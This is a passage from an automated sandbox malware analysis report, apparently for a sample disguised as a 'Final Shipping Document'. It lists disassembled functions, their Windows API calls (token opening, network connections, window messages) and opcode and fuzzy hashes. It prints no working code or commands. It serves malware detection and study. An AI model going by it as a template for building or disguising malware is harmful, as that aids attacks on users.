                                                            • EndPath.GDI32(?), ref: 00C388A4
                                                            • StrokePath.GDI32(?), ref: 00C388B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                            • String ID:
                                                            • API String ID: 1539411459-0
                                                            • Opcode ID: d9c9373388bdf2cea086e0ad96db27897078d0799bb066647faee617e0b802b9
                                                            • Instruction ID: cb04907acd1de4c003d39435b199a5d88053c01d3bf1a17d706b81b102169c1f
                                                            • Opcode Fuzzy Hash: d9c9373388bdf2cea086e0ad96db27897078d0799bb066647faee617e0b802b9
                                                            • Instruction Fuzzy Hash: 4AF03A36055658BADB126F98AC09FCE3B69AF06710F048000FB12750E2C7B55651DBA5
                                                            Function 00BB98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 00BB98CC
                                                            • SetTextColor.GDI32(?,?), ref: 00BB98D6
                                                            • SetBkMode.GDI32(?,00000001), ref: 00BB98E9
                                                            • GetStockObject.GDI32(00000005), ref: 00BB98F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Color$ModeObjectStockText
                                                            • String ID:
                                                            • API String ID: 4037423528-0
                                                            • Opcode ID: 09848b27196b1ca2b084e286c1bfa038ee74779f33d45d4e4fa20c39bfb30433
                                                            • Instruction ID: b68195b43489252511bda0ed74c57f76570a7fc7e9d3bebc020e2ac3b7fe46db
                                                            • Opcode Fuzzy Hash: 09848b27196b1ca2b084e286c1bfa038ee74779f33d45d4e4fa20c39bfb30433
                                                            • Instruction Fuzzy Hash: BDE06531254244AEDB215B74AC49BEC3F60EB11335F048259F7F5650E1C7714644AB10
                                                            Function 00C0162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 00C01634
                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C011D9), ref: 00C0163B
                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C011D9), ref: 00C01648
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C011D9), ref: 00C0164F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CurrentOpenProcessThreadToken
                                                            • String ID:
                                                            • API String ID: 3974789173-0
                                                            • Opcode ID: 74efa4270091606be8100f6f508a2d9658c1cb9f7382123b06c7f536d7a5b27f
                                                            • Instruction ID: cf4c3348cc1877c5daed7b1877e49d3afe94742b7e078e3abac7f937259ec3c1
                                                            • Opcode Fuzzy Hash: 74efa4270091606be8100f6f508a2d9658c1cb9f7382123b06c7f536d7a5b27f
                                                            • Instruction Fuzzy Hash: 0DE08C32612211EBD7201FA0AE8DB8F7B7CEF447A2F188808F655E9090E7358544CB60
                                                            Function 00BFD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 00BFD858
                                                            • GetDC.USER32(00000000), ref: 00BFD862
                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BFD882
                                                            • ReleaseDC.USER32(?), ref: 00BFD8A3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: 7262bf3a4840767c1e63ca3cfeaf04fa468ab0ddfb5aa5f5ec1bef0ae7e0a18f
                                                            • Instruction ID: cb6f619aac62b18cbf8b7640cacc2efe2ad4cb9ae9ae08284dd15beed07017db
                                                            • Opcode Fuzzy Hash: 7262bf3a4840767c1e63ca3cfeaf04fa468ab0ddfb5aa5f5ec1bef0ae7e0a18f
                                                            • Instruction Fuzzy Hash: 53E0E5B1810204DFCB41AFA0D88976DBBF2AB08310F108049F856A7260C7398905AF40
                                                            Function 00BFD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 00BFD86C
                                                            • GetDC.USER32(00000000), ref: 00BFD876
                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BFD882
                                                            • ReleaseDC.USER32(?), ref: 00BFD8A3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: cb0364d3a3770563c6055c6cca38ad935e2a51238827ccb01190445c81d37970
                                                            • Instruction ID: dbdbc3563191a9768c86078632e61a9e83281ce22ffd3c1cb4049ece75dc3d20
                                                            • Opcode Fuzzy Hash: cb0364d3a3770563c6055c6cca38ad935e2a51238827ccb01190445c81d37970
                                                            • Instruction Fuzzy Hash: 95E012B1810200EFCB40AFA0D88D76DBFF1BB08310F108048F85AF7260CB389901AF40
                                                            Function 00C14D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA7620: _wcslen.LIBCMT ref: 00BA7625
                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00C14ED4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Connection_wcslen
                                                            • String ID: *$LPT
                                                            • API String ID: 1725874428-3443410124
                                                            • Opcode ID: a1a6038c730af7b76d57b42ab58871a68530e28bf4db83a9dd9ea228fc66704e
                                                            • Instruction ID: d86817c19c2b9f8948324cd0fad8c0833a973262111e00f06d1de6643558f259
                                                            • Opcode Fuzzy Hash: a1a6038c730af7b76d57b42ab58871a68530e28bf4db83a9dd9ea228fc66704e
                                                            • Instruction Fuzzy Hash: F8915175A042049FCB18DF98C494EE9BBF1BF46304F198099E41A9F392D731EE86DB91
                                                            Function 00BCE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 00BCE30D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandling__start
                                                            • String ID: pow
                                                            • API String ID: 3213639722-2276729525
                                                            • Opcode ID: eaa165182c4134573245f3cd454d262ced0853cf536c95a1786993e1fa2b6902
                                                            • Instruction ID: de6120ff4715f0bac8d1289c299f3a3f8154be91922a9b84c457209922f2bc7a
                                                            • Opcode Fuzzy Hash: eaa165182c4134573245f3cd454d262ced0853cf536c95a1786993e1fa2b6902
                                                            • Instruction Fuzzy Hash: 84517BA1A4C201D7DB167714C942BFDABE8EB40740F6449EEF0A5863A9FF34CC859A46
                                                            Function 00BBE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #
                                                            • API String ID: 0-1885708031
                                                            • Opcode ID: 61b41084eed88c0d8427b27c9c9bf2fc6c0aa823415ceda37bcd5dd8e7f48624
                                                            • Instruction ID: ac4c021884c078cf4735990cedd3997807001cdabe35f301a15e8e3288b7266a
                                                            • Opcode Fuzzy Hash: 61b41084eed88c0d8427b27c9c9bf2fc6c0aa823415ceda37bcd5dd8e7f48624
                                                            • Instruction Fuzzy Hash: CD510F7550424A9FDB15EF28C081AFE7BE4EF16310F2440E5E9A19B2E0DA74DD46CBA0
                                                            Function 00BBF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00BBF2A2
                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00BBF2BB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            • Opcode ID: 31edefd3ff915d871abf4dc2b349ac77c0ba1ae147ee03559006b058ec49e055
                                                            • Instruction ID: 20a9d03745f036afe3067ad962ee0e52df544b37c577cc08a34bf989ab0a1279
                                                            • Opcode Fuzzy Hash: 31edefd3ff915d871abf4dc2b349ac77c0ba1ae147ee03559006b058ec49e055
                                                            • Instruction Fuzzy Hash: 4551237241C7449BD320AF10DC86BAFBBF8FB85300F81889DF199511A5EB718569CB66
                                                            Function 00C25745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00C257E0
                                                            • _wcslen.LIBCMT ref: 00C257EC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper_wcslen
                                                            • String ID: CALLARGARRAY
                                                            • API String ID: 157775604-1150593374
                                                            • Opcode ID: bd9ec67f2070c2d95cdcce29aad87ecfd7b5b212cdcef0048493926ce8163813
                                                            • Instruction ID: 5f9e55dbcfaffabfd8b53fe8a4017276893b158f46b6d92c17cb1aa965e0f98b
                                                            • Opcode Fuzzy Hash: bd9ec67f2070c2d95cdcce29aad87ecfd7b5b212cdcef0048493926ce8163813
                                                            • Instruction Fuzzy Hash: 3B41E131E002199FCB04DFA9D8819FEBBF4FF59324F104069E415AB291E7B09E81CBA0
                                                            Function 00C1D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00C1D130
                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C1D13A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CrackInternet_wcslen
                                                            • String ID: |
                                                            • API String ID: 596671847-2343686810
                                                            • Opcode ID: 4d7cbc6de79bdf7754114fc502bfe41fa4797ff51a9255fd7094403108070e93
                                                            • Instruction ID: 1c692efbab8562a6a57be018727d26126869ebc921a963636188c7974e26314d
                                                            • Opcode Fuzzy Hash: 4d7cbc6de79bdf7754114fc502bfe41fa4797ff51a9255fd7094403108070e93
                                                            • Instruction Fuzzy Hash: 90313E71D00219ABCF15EFA5CC85EEEBFB9FF06350F100059F825A6161D735AA46DB60
                                                            Function 00C3356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00C33621
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C3365C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$DestroyMove
                                                            • String ID: static
                                                            • API String ID: 2139405536-2160076837
                                                            • Opcode ID: d0efb8c326343408af56ac1c7b74845faff47c279ecd37286ecb56398b3795d6
                                                            • Instruction ID: ef2808cdfc1f5453755a7530b46a9b1b97ff1d7d7888187d3c0f755383a8ff3a
                                                            • Opcode Fuzzy Hash: d0efb8c326343408af56ac1c7b74845faff47c279ecd37286ecb56398b3795d6
                                                            • Instruction Fuzzy Hash: F9318B71120244AEDB209F28DC81FFB73B9FF88724F009619F9A5D7290DA35AE91D760
                                                            Function 00C34537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00C3461F
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C34634
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: '
                                                            • API String ID: 3850602802-1997036262
                                                            • Opcode ID: 18cb2abcc48e4c245cc59fe9d363151cee6d7dcb3d8d4bc5ebd6aa2140b24571
                                                            • Instruction ID: 19423df43a5da8749fa41ae678531598305918ae0017ba468f61fc4b6ab622ab
                                                            • Opcode Fuzzy Hash: 18cb2abcc48e4c245cc59fe9d363151cee6d7dcb3d8d4bc5ebd6aa2140b24571
                                                            • Instruction Fuzzy Hash: B5311874E013099FDB18CFA9C991BDABBB5FF49300F14406AE915AB351D770AA41CF90
                                                            Function 00C331EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C3327C
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C33287
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            • Opcode ID: e063a266226d33306fef1be75ab095430242b1787fadf854ff006d97a357c14e
                                                            • Instruction ID: c45383a4a841630c55fe29535690acf7b1e41f85930f9f90d29e4fe7c52c8698
                                                            • Opcode Fuzzy Hash: e063a266226d33306fef1be75ab095430242b1787fadf854ff006d97a357c14e
                                                            • Instruction Fuzzy Hash: FE11C4717102487FFF259F54DC81FBB376AEB94364F104228F9289B292D6729E518B60
                                                            Function 00C33710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BA604C
                                                              • Part of subcall function 00BA600E: GetStockObject.GDI32(00000011), ref: 00BA6060
                                                              • Part of subcall function 00BA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA606A
                                                            • GetWindowRect.USER32(00000000,?), ref: 00C3377A
                                                            • GetSysColor.USER32(00000012), ref: 00C33794
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
                                                            • Opcode ID: 5353270f429e1674d2b0f128d1eeb527ef35d2c46b96210f32a9d6eae35d3b2e
                                                            • Instruction ID: 9cbc42664de393e9b1be210ffab410747afeac5e34ce3c031ce44f521df7b483
                                                            • Opcode Fuzzy Hash: 5353270f429e1674d2b0f128d1eeb527ef35d2c46b96210f32a9d6eae35d3b2e
                                                            • Instruction Fuzzy Hash: 421129B2620209AFDF10DFA8CD46AEE7BB8EB09314F014514F965E2250D735E9519B50
                                                            Function 00C1CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C1CD7D
                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C1CDA6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Internet$OpenOption
                                                            • String ID: <local>
                                                            • API String ID: 942729171-4266983199
                                                            • Opcode ID: b079c6238524cdbacfacac2f809ce7d9fbddd66dfe078ee562d29eb5d8802666
                                                            • Instruction ID: b8f18db571025650feec05b1fbc83d7d8e2be1e7cf3eb54a624f9f803c80dbaa
                                                            • Opcode Fuzzy Hash: b079c6238524cdbacfacac2f809ce7d9fbddd66dfe078ee562d29eb5d8802666
                                                            • Instruction Fuzzy Hash: 9F11E371281631BAD7345B669CC4FE7BE68EB137A4F004226F11992180D2609990E6F0
                                                            Function 00C33429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 00C334AB
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C334BA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            • Opcode ID: 192a17871c7fef428afafb6d11f707949065668db80bae8b5ba85f6f27a8dd0f
